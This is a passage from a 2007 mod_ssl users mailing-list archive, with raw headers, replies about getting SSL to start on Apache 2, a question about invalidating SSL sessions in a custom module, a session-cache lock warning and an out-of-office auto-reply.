Delivered-To: modssl-users@modssl.org
Received: from nz-out-0506.google.com (nz-out-0506.google.com [64.233.162.238])
	by master.modssl.org (Postfix) with ESMTP id 6B61014D82C
	for ; Fri, 27 Apr 2007 17:58:39 +0200 (CEST)
Received: by nz-out-0506.google.com with SMTP id o37so1393301nzf
        for ; Fri, 27 Apr 2007 08:57:57 -0700 (PDT)
DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed;
        d=gmail.com; s=beta;
        h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=NoT8bNvD0M8O8znDzcxj3HtrGKbxqejGqj+uYr3QAo6IjF/D+TfYtfHlJDIYTzakrUrUgTtEqJWs5kFxRxoHNfEvD94c/ffO+AFi+jWTZ8pX9pz+1GSZiWw4/mH3sCKUb6hxvLNDPeeJgG61nJ85JdLKlewCqdQipHxy4W+CFtc=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=beta;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=RxiK91y1+f96AilpKABBwQNF/4y6GmZaPQqM8mB0TU+wZjeV44yJyTxm99a5kE/KXP8V/+vnFO4TphJID5cx9nIY6/BhaTuzJclmckFDCDLYF809zVPe/DgpmkXyMXcZV2U0jeo/qzIjGSerr0GmQxjHOOuRkMkg9nmCOaXEJdU=
Received: by 10.114.93.17 with SMTP id q17mr1028609wab.1177689476691;
        Fri, 27 Apr 2007 08:57:56 -0700 (PDT)
Received: by 10.115.94.18 with HTTP; Fri, 27 Apr 2007 08:57:56 -0700 (PDT)
Message-ID: <773acc7b0704270857o165fc8d6x1590b5b59b62a86a@mail.gmail.com>
Date: Fri, 27 Apr 2007 11:57:56 -0400
From: "javier rojas" 
To: modssl-users@modssl.org
Subject: Re: cant start ssl on apache2
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
References: <773acc7b0704270749i35a47871q73751129aedf2dd9@mail.gmail.com>
	 <20070427151905.GB28391@ligo.caltech.edu>
	 <773acc7b0704270830h1104e639x9df0448de5dbacfe@mail.gmail.com>
	 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "javier rojas" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

2007/4/27, David P. Mott :
> On Fri, 27 Apr 2007, javier rojas wrote:
>
> > 2007/4/27, Phil Ehrens :
> >> Are you calling apachectl using the full path to the apachectl
> >> that knows where THOSE conf files are?
> >>
> >
> > /usr/local/apache2/bin/apachectl restart
> >
> > to see if apachectl was reading the correct httpd.conf and it didn't
> > start the server....
>
> I don't know if this will help... I have an installation on linux (2.4.18)
> wherein apache is installed in /usr/local/apachessl2/, and if I issue the
> 'apachectl restart' command it will *not* start SSL.
>
> Instead, I must execute 'apachectl startssl'.
>
> You can see if you have this situation: just examine the apachessl script
> (using less, vi, or your favorite editor) and search for 'startssl'.  In
> my script, it looks like it just boils down to a '-DSSL' being passed to
> the invocation of httpd.
>
> You may also want to invoke the httpd executable by-hand to see if it
> issues anything on STDERR, and also check the error logfile that you have
> specified in your .conf file.  If Apache is getting that far, it will
> almost certainly give you some good feedback.
>
> Finally (or perhaps first), you may want to invoke 'apachectl -t' to have
> it check your config file for syntax errors.  It will not only tell you if
> you've mistyped something, but in some cases it'll tell you that you've
> left something out or specified conflicting configuration options.

hello :)

if u comment the lines



in your ssl.conf file, everytime you start your server it will
automatically start support for ssl, so there's no need for
apachectl startssl

the problem is that in the log folder in apache2, theres no log file
for ssl, so i think apache is not starting ssl support

/usr/local/apache2/bin/apachectl -t
Syntax OK

i didnt know this one, its very useful, thanks a lot!!!...:)

-- 
Ciao, Javier
linux counter #393724
GPG Key Fingerprint = 46B76CFEDB0161089D9ECB22FEFDE7EBA8C2007E
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 27 18:08:37 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7FD5914D8B5; Fri, 27 Apr 2007 18:08:37 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from acrux.ligo.caltech.edu (acrux.ligo.caltech.edu [131.215.115.14])
	by master.modssl.org (Postfix) with ESMTP id A2AC514D8AA
	for ; Fri, 27 Apr 2007 18:08:36 +0200 (CEST)
Received: from tarazed.ligo.caltech.edu (tarazed [131.215.115.31])
	by acrux.ligo.caltech.edu (8.12.11/8.12.11) with ESMTP id l3RG7jSC005512
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT)
	for ; Fri, 27 Apr 2007 09:07:47 -0700 (PDT)
Received: from tarazed.ligo.caltech.edu (localhost.localdomain [127.0.0.1])
	by tarazed.ligo.caltech.edu (8.13.7/8.13.4) with ESMTP id l3RG7exM006902
	for ; Fri, 27 Apr 2007 09:07:40 -0700
Received: (from pehrens@localhost)
	by tarazed.ligo.caltech.edu (8.13.7/8.13.4/Submit) id l3RG7eHk006901
	for modssl-users@modssl.org; Fri, 27 Apr 2007 09:07:40 -0700
Date: Fri, 27 Apr 2007 09:07:40 -0700
From: Phil Ehrens 
To: modssl-users@modssl.org
Subject: Re: cant start ssl on apache2
Message-ID: <20070427160739.GB6439@ligo.caltech.edu>
References: <773acc7b0704270749i35a47871q73751129aedf2dd9@mail.gmail.com> <20070427151905.GB28391@ligo.caltech.edu> <773acc7b0704270830h1104e639x9df0448de5dbacfe@mail.gmail.com> <20070427154744.GA6439@ligo.caltech.edu> <773acc7b0704270854p461a0830g270f0057df3ae4f4@mail.gmail.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <773acc7b0704270854p461a0830g270f0057df3ae4f4@mail.gmail.com>
Shoe-Size: 9-1/2
User-Agent: Mutt/1.5.12-2006-07-14
X-Spam-Score: undef - Domain Whitelisted (ligo.caltech.edu: )
X-Canit-Stats-ID: 6550664 - edb13b32829d
X-Scanned-By: CanIt (www . roaringpenguin . com) on 131.215.115.14
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Phil Ehrens 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

javier rojas wrote:
> >And when you run
> >
> > /usr/local/apache2/bin/httpd -V
> >
> >Does everything look okay?
> 
> mmmmm, this is what i was looking for.....
> 
> /usr/local/apache2/bin/httpd -V
> Server version: Apache/2.0.49
> Server built:   Apr 23 2007 10:41:23
> Server's Module Magic Number: 20020903:7
> Architecture:   64-bit
> Server compiled with....
> -D APACHE_MPM_DIR="server/mpm/prefork"
> -D APR_HAS_SENDFILE
> -D APR_HAS_MMAP
> -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
> -D APR_USE_PROC_PTHREAD_SERIALIZE
> -D APR_USE_PTHREAD_SERIALIZE
> -D SINGLE_LISTEN_UNSERIALIZED_ACCEPT
> -D APR_HAS_OTHER_CHILD
> -D AP_HAVE_RELIABLE_PIPED_LOGS
> -D HTTPD_ROOT="/usr/local/apache2"
> -D SUEXEC_BIN="/usr/local/apache2/bin/suexec"
> -D DEFAULT_PIDLOG="logs/httpd.pid"
> -D DEFAULT_SCOREBOARD="logs/apache_runtime_status"
> -D DEFAULT_LOCKFILE="logs/accept.lock"
> -D DEFAULT_ERRORLOG="logs/error_log"
> -D AP_TYPES_CONFIG_FILE="conf/mime.types"
> -D SERVER_CONFIG_FILE="conf/httpd.conf"
> 
> i think it was not compiled with ssl support....:(

It won't tell you that from -V. Is there a file named:

 /usr/local/apache2/modules/mod_ssl.so

Phil
-- 
Phil Ehrens | Fun stuff:
The LIGO Laboratory, MS 18-34         | http://www.ralphmag.org
California Institute of Technology    | http://www.trenchman.com
1200 East California Blvd.            | http://www.tokyotosho.com
Pasadena, CA 91125 USA                | My gpg public key:
Phone:(626)395-8518 Fax:(626)793-9744 | http://www.imbe.net/peligo.asc
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 27 19:36:49 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CACA714D88B; Fri, 27 Apr 2007 19:36:49 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ptmexu03os.ptc.pentagon.mil (ptmexu03os.ptcmsg.pentagon.mil [140.185.212.88])
	by master.modssl.org (Postfix) with ESMTP id 5C41814D82C
	for ; Fri, 27 Apr 2007 19:36:47 +0200 (CEST)
Received: by ptmexu03os.ptc.pentagon.mil with Internet Mail Service (5.5.2657.72)
	id ; Fri, 27 Apr 2007 17:36:09 -0000
Message-ID: <1296389ADC3D474C93D6F9E9C5DB317D0433506C@ddsmttayz028>
From: "Hale, Andrew T CTR DMDC" 
To: "'modssl-users@modssl.org'" 
Subject: Re: Apache 2.x : Terminate SSL Session from own module ?
Date: Fri, 27 Apr 2007 17:36:04 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2657.72)
MIME-Version: 1.0
Content-Type: multipart/signed;
	protocol="application/x-pkcs7-signature";
	micalg=SHA1;
	boundary="----=_NextPart_000_0005_01C788B7.D9979090"
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.3028
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Hale, Andrew T CTR DMDC" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0005_01C788B7.D9979090
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

I am trying to terminate a two-way SSL session after a user successfully
logs off.  I need to terminate the SSL session on the server because the
client application is in a kiosk and the user cannot close the browser or
clear the SSL cache.  

In Serge's response below he refers to 'my own module'.  Is he modifying the
mod_ssl module and deploying that or can I directly make calls to the
mod_ssl module in a custom c module?  Sorry I am not familiar with c modules
but am familiar with perl modules and have written authn and authz handlers.

I appreciate any help you can provide.

Andy Hale


Serge Hauser wrote:

Tue, 24 Oct 2006 06:53:50 -0700

Hi all,

i try to terminate a session in my own module by setting the creation time
and flushing the cache, unfortunately by the next request from the same
client i get the same session again. (actually it seems to take it from the
cache (ignoring the openssl sessioncache attributes). 

is there any way i can force mod_ssl to explicitly invalidate a session so
it will get deleted from the cache aswell ? 

the code is use is basically:

r->connection->keepalive = -1;
ssl_sess = SSL_get_session(ssl);
ssl_ctx = SSL_get_SSL_CTX(ssl);
SSL_CTX_remove_session(ssl_ctx, ssl_sess); SSL_SESSION_set_time(ssl_sess,
0); SSL_CTX_flush_sessions(ssl_ctx, time(0)); ssl_sess->not_resumable = 1;


anyone has a hint for me what i am doing wrong or what i additionally need
to do to get rid of the session ? 

thanks
Serge

Andy Hale
Modis IT
DEERS/Defense Manpower Data Center
Phone: (831) 583-2500 Ext. 4719
Email: Andrew.Hale.CTR@osd.pentagon.mil

------=_NextPart_000_0005_01C788B7.D9979090
Content-Type: application/x-pkcs7-signature;
	name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="smime.p7s"

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIQgTCCA3Aw
ggJYoAMCAQICAQUwDQYJKoZIhvcNAQEFBQAwWzELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD1UuUy4g
R292ZXJubWVudDEMMAoGA1UECxMDRG9EMQwwCgYDVQQLEwNQS0kxFjAUBgNVBAMTDURvRCBSb290
IENBIDIwHhcNMDQxMjEzMTUwMDEwWhcNMjkxMjA1MTUwMDEwWjBbMQswCQYDVQQGEwJVUzEYMBYG
A1UEChMPVS5TLiBHb3Zlcm5tZW50MQwwCgYDVQQLEwNEb0QxDDAKBgNVBAsTA1BLSTEWMBQGA1UE
AxMNRG9EIFJvb3QgQ0EgMjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMAswfaNO6z/
PzzWcb64dCIH7HBBFfyrQOMHqsHD2J/+2kw6vz/I2Ch7SzYBwKxFJcPSDgqPhRhkED0aE3Aqb47X
3I2Ts0EPOCHNravCPSoF01cRNw3NjFH5k+PMRkkhjhS0zcsUPjjNcjHuqxLyZeo0LlZd/+5jdctt
upE0/J7z9C0cvlDEQt9ZiP9qs/qobD3LVnFxBZa7n4DlgEVZZ0Gw68OtYKSAdQYXnA70Q+CZDhv7
f/WzzLKBgrH9MsG4vkGkZLVgOlpRMIzO3kEsGUdcSRBkuXSph0GvfW66wbihv2UxOgRn+bW7jpKK
AGO4seaMOF+D/1DVO6Jda7IQzGMCAwEAAaM/MD0wHQYDVR0OBBYEFEl0uwxeunr+AlTve6DGlcYJ
gHCWMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBBQUAA4IBAQCYkY0/
ici79cBpcyk7Nay6swh2PXAJkumERCEBfRR2G+5RbB2NFTctezFp9JpEuK9GzDT6I8sDJxnSgyF1
K+fgG5km3IRAleio0sz2WFxm7z9KlxCCHboKot1bBiudp2RO6y4BNaS0PxOtVeTVc6hpmxHxmPIx
Hm9A1Ph4n46RoG9wBJBmqgYrzuF6krV94eDRluehOi3MsZ0fBUTth5nTTRpwOcEEDOV+2fGv1yAO
8SJ6JaRzmcw/pAcnlqiile2CuRbTnguHwsHyiPVi32jfx7xpUe2xXNxUVCkPCTmarAPB2wxNrm8K
ehZJ8b+R0jiU0/aVLLdsyUK2jcqQjYXZMIIEOjCCAyKgAwIBAgIBDDANBgkqhkiG9w0BAQUFADBb
MQswCQYDVQQGEwJVUzEYMBYGA1UEChMPVS5TLiBHb3Zlcm5tZW50MQwwCgYDVQQLEwNEb0QxDDAK
BgNVBAsTA1BLSTEWMBQGA1UEAxMNRG9EIFJvb3QgQ0EgMjAeFw0wNjAxMDkxMzU0NDVaFw0xMjAx
MDgxMzU0NDVaMF0xCzAJBgNVBAYTAlVTMRgwFgYDVQQKEw9VLlMuIEdvdmVybm1lbnQxDDAKBgNV
BAsTA0RvRDEMMAoGA1UECxMDUEtJMRgwFgYDVQQDEw9ET0QgRU1BSUwgQ0EtMTIwgZ8wDQYJKoZI
hvcNAQEBBQADgY0AMIGJAoGBAOMipu6KoqTRAUZ7UkNWpnsU8LTqgVNUzytsai1+xI4quLLLY0ap
i8kp/wt5XfJO2crkWrNAQN3/RdQc1E5aiyLa8xJ/k7jpaYc3oqqsQxCZmGpaUfya61LlTbGZ9V33
2rxW5Y6dHWKSWiG3S9cWgmKV1YaVyvAckEB0Wl9GvG0DAgMBAAGjggGJMIIBhTAOBgNVHQ8BAf8E
BAMCAYYwHwYDVR0jBBgwFoAUSXS7DF66ev4CVO97oMaVxgmAcJYwHQYDVR0OBBYEFNXDKYygd9wc
KAhOd0//6RMRY0EzMAwGA1UdJAQFMAOAAQAwDwYDVR0TAQH/BAUwAwEB/zAwBgNVHSAEKTAnMAsG
CWCGSAFlAgELBTALBglghkgBZQIBCwkwCwYJYIZIAWUCAQsKMIHhBgNVHR8EgdkwgdYwOqA4oDaG
NGh0dHA6Ly9jcmwuY2hhbWIuZGlzYS5taWwvZ2V0Y3JsP0RvRCUyMFJvb3QlMjBDQSUyMDIwgZeg
gZSggZGGgY5sZGFwOi8vY3JsLmNoYW1iLmRpc2EubWlsL2NuJTNkRG9EJTIwUm9vdCUyMENBJTIw
MiUyY291JTNkUEtJJTJjb3UlM2REb0QlMmNvJTNkVS5TLiUyMEdvdmVybm1lbnQlMmNjJTNkVVMl
M2ZjZXJ0aWZpY2F0ZXJldm9jYXRpb25saXN0JTNiYmluYXJ5MA0GCSqGSIb3DQEBBQUAA4IBAQAq
Hwqddw7lm/rkkc1tqF2eng0WP83QoU9Ubb5rlu4hjV8TszREYoAQwt60DIccMEaZvni9YUhy6CZQ
m2aTHugiE/FL/y3r5Z8/iKUv3XtXtmCyBnxnC39dzqcbONSo5N7GPbKSlwf3BGrFWJdS4aiNtbIV
FEeAeDLDBTv6LECiSXLfZbv1rJZtGAXakoozRwPRSYhOxNc4C6QI9e6Qf2FK3pnB0vaG3ojd5IAH
1PhPpDworgMX3kYzSUNDrQaQJ6aPQbeeZuhvJOEturlhndxDfA4t8kN6VPNziqGfMtwpVx4uW59z
WoL0Yx3rHWMQzmZA5Cnf14reZ3q/nI3Qx7foMIIEPjCCA6egAwIBAgIDG1diMA0GCSqGSIb3DQEB
BQUAMF0xCzAJBgNVBAYTAlVTMRgwFgYDVQQKEw9VLlMuIEdvdmVybm1lbnQxDDAKBgNVBAsTA0Rv
RDEMMAoGA1UECxMDUEtJMRgwFgYDVQQDEw9ET0QgRU1BSUwgQ0EtMTIwHhcNMDcwMTE5MDAwMDAw
WhcNMDcxMTI0MjM1OTU5WjB5MQswCQYDVQQGEwJVUzEYMBYGA1UEChMPVS5TLiBHb3Zlcm5tZW50
MQwwCgYDVQQLEwNEb0QxDDAKBgNVBAsTA1BLSTETMBEGA1UECxMKQ09OVFJBQ1RPUjEfMB0GA1UE
AxMWSEFMRS5BTkRZLlQuMTI3MjY4MjMyODCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEA2UED
QipSEgA2NOSNzKwPiP2CvXF0QrnaEn1K+VFlNEp2rXfdGqDVlV3FpBHoezwhAEJH+uJ7iJ0EsBD+
B4NkD+kbRdM9fmZR2qkO70rQW9aVTRgzxAkTTxGoqgt+WAK38VkOtdYEMZOxUxvqiDs75xaGip1W
KIU8LypKp0f4voECAwEAAaOCAe4wggHqMA4GA1UdDwEB/wQEAwIFIDArBgNVHREEJDAigSBBbmRy
ZXcuSGFsZS5DVFJAb3NkLnBlbnRhZ29uLm1pbDAfBgNVHSMEGDAWgBTVwymMoHfcHCgITndP/+kT
EWNBMzAdBgNVHQ4EFgQUDd1/k+xirV7U7xOqPL35Vc5P8HcwFgYDVR0gBA8wDTALBglghkgBZQIB
CwkwcwYIKwYBBQUHAQEEZzBlMEEGCCsGAQUFBzAChjVodHRwOi8vY3JsLmNoYW1iLmRpc2EubWls
L2dldHNpZ24/RE9EJTIwRU1BSUwlMjBDQS0xMjAgBggrBgEFBQcwAYYUaHR0cDovL29jc3AuZGlz
YS5taWwwgd0GA1UdHwSB1TCB0jA6oDigNoY0aHR0cDovL2NybC5jaGFtYi5kaXNhLm1pbC9nZXRj
cmw/RE9EJTIwRU1BSUwlMjBDQS0xMjCBk6CBkKCBjYaBimxkYXA6Ly9jcmwuY2hhbWIuZGlzYS5t
aWwvY24lM2RET0QlMjBFTUFJTCUyMENBLTEyJTJjb3UlM2RQS0klMmNvdSUzZERvRCUyY28lM2RV
LlMuJTIwR292ZXJubWVudCUyY2MlM2RVUz9jZXJ0aWZpY2F0ZXJldm9jYXRpb25saXN0O2JpbmFy
eTANBgkqhkiG9w0BAQUFAAOBgQBSQsRcomJ/Bi69zBFYzsTo9z17zQpQySt6/s3wdhA8m+UvVM6e
1ge83RcHTg0by6zttdj+DgcMim8JVPoNfJIHtpKeqLuHbkHtQxdfSHhTqXsmk0CTZRxBwBSmqB5N
rduxeVgZ6tRzQFK8tYE0BaHhZaSc981RLeB8aDUi5Z4UcjCCBIkwggPyoAMCAQICAxtXZTANBgkq
hkiG9w0BAQUFADBdMQswCQYDVQQGEwJVUzEYMBYGA1UEChMPVS5TLiBHb3Zlcm5tZW50MQwwCgYD
VQQLEwNEb0QxDDAKBgNVBAsTA1BLSTEYMBYGA1UEAxMPRE9EIEVNQUlMIENBLTEyMB4XDTA3MDEx
OTAwMDAwMFoXDTA3MTEyNDIzNTk1OVoweTELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD1UuUy4gR292
ZXJubWVudDEMMAoGA1UECxMDRG9EMQwwCgYDVQQLEwNQS0kxEzARBgNVBAsTCkNPTlRSQUNUT1Ix
HzAdBgNVBAMTFkhBTEUuQU5EWS5ULjEyNzI2ODIzMjgwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJ
AoGBAKpbfrISl9BPSHoDAubZW5yLVqW1GgcM6quQlxiw4M9yhpEEIfNoQXcmggvZ8MQyZ1aKSNG9
ZmERcunE3QkT2cQXel5duxj1re1xDKDXKgzdgdNn2goKU0B9iobpuuhEzZxO646aeG3pwRzPvS7s
wKiaFmbKgt+SOD0rwp5TCWSBAgMBAAGjggI5MIICNTAOBgNVHQ8BAf8EBAMCBsAwHwYDVR0jBBgw
FoAU1cMpjKB33BwoCE53T//pExFjQTMwHQYDVR0OBBYEFDgkCE9O9CJdps+e+9d6EfFTRTaDMBYG
A1UdIAQPMA0wCwYJYIZIAWUCAQsJMHMGCCsGAQUFBwEBBGcwZTBBBggrBgEFBQcwAoY1aHR0cDov
L2NybC5jaGFtYi5kaXNhLm1pbC9nZXRzaWduP0RPRCUyMEVNQUlMJTIwQ0EtMTIwIAYIKwYBBQUH
MAGGFGh0dHA6Ly9vY3NwLmRpc2EubWlsMIHdBgNVHR8EgdUwgdIwOqA4oDaGNGh0dHA6Ly9jcmwu
Y2hhbWIuZGlzYS5taWwvZ2V0Y3JsP0RPRCUyMEVNQUlMJTIwQ0EtMTIwgZOggZCggY2GgYpsZGFw
Oi8vY3JsLmNoYW1iLmRpc2EubWlsL2NuJTNkRE9EJTIwRU1BSUwlMjBDQS0xMiUyY291JTNkUEtJ
JTJjb3UlM2REb0QlMmNvJTNkVS5TLiUyMEdvdmVybm1lbnQlMmNjJTNkVVM/Y2VydGlmaWNhdGVy
ZXZvY2F0aW9ubGlzdDtiaW5hcnkwKQYDVR0lBCIwIAYKKwYBBAGCNxQCAgYIKwYBBQUHAwQGCCsG
AQUFBwMCMEsGA1UdEQREMEKBIEFuZHJldy5IYWxlLkNUUkBvc2QucGVudGFnb24ubWlsoB4GCisG
AQQBgjcUAgOgEAwOMTI3MjY4MjMyOEBtaWwwDQYJKoZIhvcNAQEFBQADgYEAMQUk/HkfVDp/IKDa
HN83WUYMXVXD0uY8HhXQpKVx+SBypk2pVKBgdtbjNN8i2k0hjnUyuuKslpjP7i5tdmKwF9vm+56e
3BTnpNPDCtK9hKT3fOoUDvqWN3TMbY3qRKU9RTZ5QaQSLRGk9RK56gL+HQppD5a3jEDeX0ker6B0
cOMxggLAMIICvAIBATBkMF0xCzAJBgNVBAYTAlVTMRgwFgYDVQQKEw9VLlMuIEdvdmVybm1lbnQx
DDAKBgNVBAsTA0RvRDEMMAoGA1UECxMDUEtJMRgwFgYDVQQDEw9ET0QgRU1BSUwgQ0EtMTICAxtX
ZTAJBgUrDgMCGgUAoIIBsjAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3DQEJBTEP
Fw0wNzA0MjcxNzM2MDFaMCMGCSqGSIb3DQEJBDEWBBR7o2MFe6QjVaeWsKrqNnZy9QOHvjBnBgkq
hkiG9w0BCQ8xWjBYMAoGCCqGSIb3DQMHMA4GCCqGSIb3DQMCAgIAgDANBggqhkiG9w0DAgIBQDAH
BgUrDgMCBzANBggqhkiG9w0DAgIBKDAHBgUrDgMCGjAKBggqhkiG9w0CBTBzBgkrBgEEAYI3EAQx
ZjBkMF0xCzAJBgNVBAYTAlVTMRgwFgYDVQQKEw9VLlMuIEdvdmVybm1lbnQxDDAKBgNVBAsTA0Rv
RDEMMAoGA1UECxMDUEtJMRgwFgYDVQQDEw9ET0QgRU1BSUwgQ0EtMTICAxtXYjB1BgsqhkiG9w0B
CRACCzFmoGQwXTELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD1UuUy4gR292ZXJubWVudDEMMAoGA1UE
CxMDRG9EMQwwCgYDVQQLEwNQS0kxGDAWBgNVBAMTD0RPRCBFTUFJTCBDQS0xMgIDG1diMA0GCSqG
SIb3DQEBAQUABIGAiYf/uumxDuYbMh1xTjt6M/E0UimyGEyqjeea1fAPeKzXI76OMOnuFqEzvDVs
XIOMdkxsnX7KA1gKPA6uXxEUS4WRmIYBjG4YSpHdK2fy/diUidLc+6veHNH7+bFriZAQi/GZ47Fq
cb+YCbtzZ2nAgk1pXaWu3cyweCxUzN8N6ZMAAAAAAAA=

------=_NextPart_000_0005_01C788B7.D9979090--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  9 01:52:32 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A963214D884; Wed,  9 May 2007 01:52:32 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from an-out-0708.google.com (an-out-0708.google.com [209.85.132.244])
	by master.modssl.org (Postfix) with ESMTP id 54EFE14D82C
	for ; Wed,  9 May 2007 01:52:30 +0200 (CEST)
Received: by an-out-0708.google.com with SMTP id c37so1764anc
        for ; Tue, 08 May 2007 16:51:46 -0700 (PDT)
DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed;
        d=gmail.com; s=beta;
        h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=KqED44BjsBiUAzogBw42KnUOB/YjddcFGlx31XZ7DlPoz+5zKOb87x409XLw0t16xIAo/4B2QvaG5iORBWu2l4ZzprhYIe/YK+3+3voxHd7jRmvovJWvGAWKmwH6aG9MbDnuMBEveWuZmmddCdd338/0t3H2WVx5KKA/xnFujM0=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=beta;
        h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=deeLZucHiBafSpKjLKJL+CqnPTElJ7uuxaU4v103U4RyK8kYiHhQlScvXecaNn+dX/WnkaOTvGW7nxHcpOSrHTyrmz2hTSynuFkxMNuZhxZ7el93MhuLGRGa5clCCFiLeEW+h+AXSjCVsfzJdaOdxOunSKB5E/2z+LzpR04R5SI=
Received: by 10.100.166.14 with SMTP id o14mr973790ane.1178668306115;
        Tue, 08 May 2007 16:51:46 -0700 (PDT)
Received: by 10.101.68.7 with HTTP; Tue, 8 May 2007 16:51:46 -0700 (PDT)
Message-ID: 
Date: Tue, 8 May 2007 18:51:46 -0500
From: "Brian Hayward" 
To: modssl-users@modssl.org
Subject: [warn] (45)Deadlock situation detected/avoided: Failed to acquire SSL session cache lock
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Brian Hayward" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Any suggestions on the above warning?  This happens quite a bit under
very heavy load.  We use shmcb cache (512000).

Thanks,
Brian Hayward
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  9 04:00:01 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 12FBE14D87F; Wed,  9 May 2007 04:00:01 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from frfcqmg011ix3r8.montpellier.mebs.ihost.com (mail2.aspaway.fr [129.35.163.230])
	by master.modssl.org (Postfix) with ESMTP id 52ACE14D82C
	for ; Wed,  9 May 2007 03:59:58 +0200 (CEST)
Received: from frfcqws071ix328.infra.montpellier.mebs.ihost.com (frfcqws071ix328 [10.0.77.8])
	by frfcqmg011ix3r8.montpellier.mebs.ihost.com (8.12.11.20060308/8.12.11) with ESMTP id l4920O1X003515
	for ; Wed, 9 May 2007 04:00:25 +0200
Subject: Jean-Pierre Guilloteau est absent.
From: jpguilloteau@aspaway.fr
To: modssl-users@modssl.org
Message-ID: 
Date: Wed, 9 May 2007 04:00:26 +0200
X-MIMETrack: Serialize by Router on MES01ASP/SRV/ASPAWAY(Release 7.0.2|September 26, 2006) at
 05/09/2007 04:00:28 AM
MIME-Version: 1.0
Content-type: text/plain; charset=ISO-8859-1
Content-transfer-encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jpguilloteau@aspaway.fr
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I will be out of the office starting Sat 05/05/07 and will not return u=
ntil
Mon 14/05/07.

Je r=E9pondrai =E0 votre message d=E8s mon retour.
Vous pouvez en mon absence contacter Aspaway au 01 46 67 88 88 ou notre=

support technique au 01 46 67 88 98.
Cordialement.=


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 16 18:28:54 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
